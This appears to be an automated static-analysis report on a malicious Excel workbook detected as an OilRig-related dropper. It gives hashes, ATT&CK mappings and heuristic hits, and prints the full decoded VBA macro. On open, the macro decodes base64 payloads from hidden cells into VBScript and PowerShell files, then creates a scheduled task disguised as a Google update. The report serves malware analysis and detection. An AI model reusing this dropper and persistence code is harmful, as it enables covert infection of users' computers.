Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 02e47df27545766f…

MALICIOUS

Office (OLE)

Size: 75.5 KB
Created: 2006-09-16 00:00:00
Authoring application: Microsoft Excel
First seen: 2019-03-10
MD5: 456a45b59a7588294cf25a5cab4a9821
SHA-1: 1554e74b935a61d446cb634f80d7d1e200e864bc
SHA-256: 02e47df27545766f1e3a3372ed65b71814c7418b8c56a3aeac4a937ce1682284
Risk Score: 488

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The Workbook_Open macro executes a PowerShell command to download and save a VBScript payload. The script uses WScript.Shell to create a folder and then saves the downloaded content as 'backup.vbs' and 'DnE.ps1'. The PowerShell command is constructed using base64 encoded strings, indicating a downloader functionality. The presence of 'powershell -EncodedCommand' and WScript.Shell usage strongly suggests a malicious dropper.

Heuristics (11)

  • ClamAV: Xls.Dropper.Agent-6465255-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-6465255-0
  • VBA macros detected [medium] OLE_VBA_MACROS (5 related findings)
    Document contains VBA macro code
  • WScript.Shell usage [critical] OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched lines in script:
        Set DnSPs1 = ActiveWorkbook.Worksheets("Incompatible").Cells(1, 26)
        Set wss = CreateObject("WScript.Shell")
        Set fso = CreateObject("Scripting.FileSystemObject")
  • PowerShell reference in VBA [critical] OLE_VBA_PS
    PowerShell reference in VBA
    Matched lines in script:
        End If
        cmd = "powershell ""&{$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBas" & "e64String('" & BackupVbs & "')); Set-Content '" & pth & "backup.vbs" & "' $f;$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBas" & "e64String('" & DnEPs1 & "'));$f=$f -replace '__',(Get-Random);$f='powershell -EncodedCommand \""'+([System.Convert]::ToBas" & "e64String([System.Text.Encoding]::Unicode.GetBytes($f)))+'\""'; Set-Content '" & pth & "DnE.ps1" & "' $f;$f=[System.Text.Encod …
        cmd2 = "schtasks /create /F /sc minute /mo 3 /tn " & Chr(34) & "GoogleUpdateTasksMachineUI" & Chr(34) & " /tr " & pth & "backup.vbs"
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
    Matched lines in script:
        Set DnSPs1 = ActiveWorkbook.Worksheets("Incompatible").Cells(1, 26)
        Set wss = CreateObject("WScript.Shell")
        Set fso = CreateObject("Scripting.FileSystemObject")
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro [low] OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched lines in script:
        Attribute VB_Customizable = True
        Private Sub Workbook_Open()
            Call doom_Init
  • Reference to PowerShell [high] SC_STR_POWERSHELL
    Reference to PowerShell
  • Reference to Windows Script Host [high] SC_STR_WSCRIPT
    Reference to Windows Script Host
  • LOLBin token sequence in document text [high] SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • Macro/content-enable lure [medium] SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3325 bytes
SHA-256: 7ff419cb3d5c950ba3bb9f4a60ce2f41e1512353fc2978cc30040425c5597f9e
Detection
ClamAV: Vbs.Trojan.Oilrig-6332898-2
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
    Call doom_Init
    Call doom_ShowHideSheets
End Sub

Sub doom_ShowHideSheets()
    If ActiveWorkbook.Worksheets(1).Visible Then
        Dim WS_Count As Integer
        Dim I As Integer
        WS_Count = ActiveWorkbook.Worksheets.Count
        For I = 1 To WS_Count
            ActiveWorkbook.Worksheets(I).Visible = True
        Next I
        ActiveWorkbook.Worksheets(1).Visible = False
        ActiveWorkbook.Worksheets(2).Activate
    End If
End Sub

Sub doom_Init()
    Set BackupVbs = ActiveWorkbook.Worksheets("Incompatible").Cells(1, 24)
    Set DnEPs1 = ActiveWorkbook.Worksheets("Incompatible").Cells(1, 25)
    Set DnSPs1 = ActiveWorkbook.Worksheets("Incompatible").Cells(1, 26)
    Set wss = CreateObject("WScript.Shell")
    Set fso = CreateObject("Scripting.FileSystemObject")
    pth = wss.ExpandEnvironmentStrings("%PUBLIC%") & "\Libraries\RecordedTV\"
    If Not (fso.FolderExists(pth)) Then
        fso.CreateFolder (pth)
    End If
    cmd = "powershell ""&{$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBas" & "e64String('" & BackupVbs & "')); Set-Content '" & pth & "backup.vbs" & "' $f;$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBas" & "e64String('" & DnEPs1 & "'));$f=$f -replace '__',(Get-Random);$f='powershell -EncodedCommand \""'+([System.Convert]::ToBas" & "e64String([System.Text.Encoding]::Unicode.GetBytes($f)))+'\""'; Set-Content '" & pth & "DnE.ps1" & "' $f;$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBas" & "e64String('" & DnSPs1 & "'));$f='powershell -EncodedCommand \""'+([System.Convert]::ToBas" & "e64String([System.Text.Encoding]::Unicode.GetBytes($f)))+'\""';Set-Content '" & pth & "DnS.ps1" & "' $f}"""
    cmd2 = "schtasks /create /F /sc minute /mo 3 /tn " & Chr(34) & "GoogleUpdateTasksMachineUI" & Chr(34) & " /tr " & pth & "backup.vbs"
    If Not (fso.FileExists(pth & "backup.vbs")) Then
        If Not (fso.FolderExists(pth & "up")) Then
            fso.CreateFolder (pth & "up")
        End If
        If Not (fso.FolderExists(pth & "dn")) Then
            fso.CreateFolder (pth & "dn")
        End If
        If Not (fso.FolderExists(pth & "tp")) Then
            fso.CreateFolder (pth & "tp")
        End If
        wss.Run cmd, 0
        wss.Run cmd2, 0
        Set wss = Nothing
        Set fso = Nothing
    End If
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True